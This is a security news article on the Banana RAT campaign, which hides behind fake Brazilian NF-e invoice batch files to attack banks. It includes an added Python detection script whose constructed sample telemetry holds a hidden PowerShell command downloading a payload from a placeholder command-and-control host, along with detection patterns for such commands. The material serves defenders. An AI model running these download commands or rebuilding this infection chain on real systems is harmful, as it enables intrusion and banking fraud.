A new cyber threat, Banana RAT, is targeting Brazilian financial institutions by masquerading as legitimate electronic invoices. This malware, which disguises itself as NF-e (Nota Fiscal Eletronica) documents, exploits victims’ trust by embedding malicious batch files that install a remote access tool on Windows systems. The campaign is a sophisticated operation aimed primarily at Brazil’s financial sector.
Exploiting Brazil’s Trust in NF-e Invoices
NF-e is Brazil’s official electronic invoicing system, widely recognized and trusted by businesses nationwide. Cybercriminals leverage this trust by distributing files named “Consultar_NF-e.bat” through WhatsApp or phishing links, creating the illusion of routine tax documentation. In reality, running the file gives attackers persistent access to the victim’s computer.
Trend Micro’s Managed Detection and Response (MDR) team uncovered the malware during an investigation into Brazilian banking threats. Their findings revealed both server-side tools and client-side malware, providing a comprehensive understanding of the attack.
Detailed Examination of the Attack Mechanism
Trend Micro identified the threat cluster as “SHADOW-WATER-063.” The campaign targets 16 major Brazilian banks and several regional cryptocurrency exchanges. By confining itself to Brazil’s financial institutions, the malware reduces the chance of infecting unintended targets, which would only increase its exposure.
The operation possibly follows a Malware-as-a-Service (MaaS) model, with its server-side code written in Brazilian Portuguese. The attackers have named this project “Projeto Banana,” indicating ongoing development and maintenance.
Technical Insights into Banana RAT Operations
The attack begins when the victim executes the malicious batch file, which launches a hidden PowerShell command. That command retrieves an encrypted payload, “msedge.txt,” from an attacker-controlled server. The payload is decrypted in memory rather than written to disk as a recognizable file, sidestepping conventional file-based scanning.
Once active, the malware registers a concealed scheduled task to maintain persistence. It camouflages itself within Microsoft diagnostic directories, making it hard to spot among legitimate system components. The malware also generates a unique payload for each victim, so traditional file-hash detection does not work against it.
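Because each victim receives a different payload, the stages just described are better hunted by behaviour than by hash: a batch file spawning a hidden PowerShell process that fetches a non-script file, followed by a hidden scheduled task whose action is again hidden PowerShell. The script below is an added example written for this page, not Trend Micro’s tooling or anything from the campaign. It scores constructed telemetry records whose field layout is an assumption (a simplified Sysmon Event ID 1 process-creation record and a Security Event ID 4698 task-creation record carrying the task XML). The C2 host, task name and encoded-command blob are placeholders, and since the page does not name the diagnostic directories the task hides in, the checks key on command-line and task settings rather than on paths.

```python
"""Behavioural hunt for the Banana RAT infection chain (added example, not vendor code).

Two stages are checked: (1) a PowerShell process with a batch-file parent and
hidden/download-style arguments, (2) a scheduled task whose action is hidden
PowerShell. Each indicator alone is noisy; an alert needs at least two."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Command-line traits of the hidden download-and-decrypt stage.
PS_ARG_PATTERNS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]+", re.I),
    "execution policy bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
    "web download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "payload under non-script extension": re.compile(r"\S+\.(?:txt|log|dat)\b", re.I),
}
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"  # real Task Scheduler XML namespace


def _is_powershell(image: str) -> bool:
    return image.strip('"').lower().rsplit("\\", 1)[-1] in POWERSHELL_IMAGES


def powershell_indicators(cmdline: str) -> list[str]:
    """Names of every suspicious pattern present in a PowerShell command line."""
    return [name for name, rx in PS_ARG_PATTERNS.items() if rx.search(cmdline)]


def analyze_process_event(ev: dict) -> list[str]:
    """Stage 1: the .bat lure spawning hidden PowerShell (layout of `ev` is an assumption)."""
    if not _is_powershell(ev["image"]):
        return []
    reasons = powershell_indicators(ev["cmdline"])
    if re.search(r"\.bat\b", ev.get("parent_cmdline", ""), re.I):
        reasons.append("spawned by batch file")
    return reasons


def analyze_task_xml(task_xml: str) -> list[str]:
    """Stage 2: a hidden scheduled task whose Exec action is hidden PowerShell."""
    root = ET.fromstring(task_xml)
    reasons = []
    hidden = root.find(f"./{TASK_NS}Settings/{TASK_NS}Hidden")
    if hidden is not None and (hidden.text or "").strip().lower() == "true":
        reasons.append("task hidden from Task Scheduler UI")
    for action in root.iter(f"{TASK_NS}Exec"):
        command = (action.findtext(f"{TASK_NS}Command") or "").strip()
        args = action.findtext(f"{TASK_NS}Arguments") or ""
        if _is_powershell(command):
            reasons.extend(powershell_indicators(args))
    return reasons


def hunt(process_events: list[dict], task_events: list[dict]) -> list[dict]:
    """One alert per record showing at least two indicators."""
    alerts = []
    for ev in process_events:
        reasons = analyze_process_event(ev)
        if len(reasons) >= 2:
            alerts.append({"source": "process", "id": ev["pid"], "reasons": reasons})
    for ev in task_events:
        reasons = analyze_task_xml(ev["task_content"])
        if len(reasons) >= 2:
            alerts.append({"source": "task", "id": ev["task_name"], "reasons": reasons})
    return alerts


# Constructed sample telemetry (not real victim data). The first record mirrors the
# lure chain; the second is an ordinary admin script for contrast.
PROCESS_EVENTS = [
    {"pid": 4120,
     "parent_cmdline": r'cmd.exe /c "C:\Users\ana\Downloads\Consultar_NF-e.bat"',
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                "\"Invoke-WebRequest http://c2.example.invalid/msedge.txt\""},  # placeholder host
    {"pid": 5011,
     "parent_cmdline": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]
TASK_EVENTS = [
    {"task_name": r"\Microsoft\Windows\Diagnostics\msedge",  # constructed look-alike name
     "task_content": f"""<Task xmlns="{TASK_NS[1:-1]}">
  <Settings><Hidden>true</Hidden></Settings>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-NoProfile -WindowStyle Hidden -EncodedCommand AAAA</Arguments></Exec></Actions>
</Task>"""},  # AAAA stands in for a base64 blob
    {"task_name": r"\Corp\NightlyCleanup",
     "task_content": f"""<Task xmlns="{TASK_NS[1:-1]}">
  <Settings><Hidden>false</Hidden></Settings>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-File C:\\ProgramData\\Scripts\\cleanup.ps1</Arguments></Exec></Actions>
</Task>"""},
]

if __name__ == "__main__":
    for alert in hunt(PROCESS_EVENTS, TASK_EVENTS):
        print(alert)
```

The two-indicator threshold is the design choice worth adjusting locally: a lone `-WindowStyle Hidden` is common in legitimate automation, but hidden plus a batch-file parent, or hidden plus a download of a `.txt` file, is rare enough to page on, and none of it depends on the payload hash.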
Robust Capabilities of Banana RAT
Banana RAT acts as a comprehensive platform for remote fraud and surveillance. It can stream victims’ screens, log keystrokes, simulate legitimate banking interfaces, and manipulate Pix QR codes during transactions. The malware communicates with its control server using a custom encrypted protocol, further complicating detection.
Security experts recommend blocking known network indicators, enabling real-time behavioral monitoring, and educating users about suspicious activities, especially during banking sessions.
The threat posed by Banana RAT underscores the importance of robust cybersecurity measures in protecting financial institutions. As this campaign evolves, continuous vigilance and proactive defense strategies are crucial to safeguarding sensitive financial data.
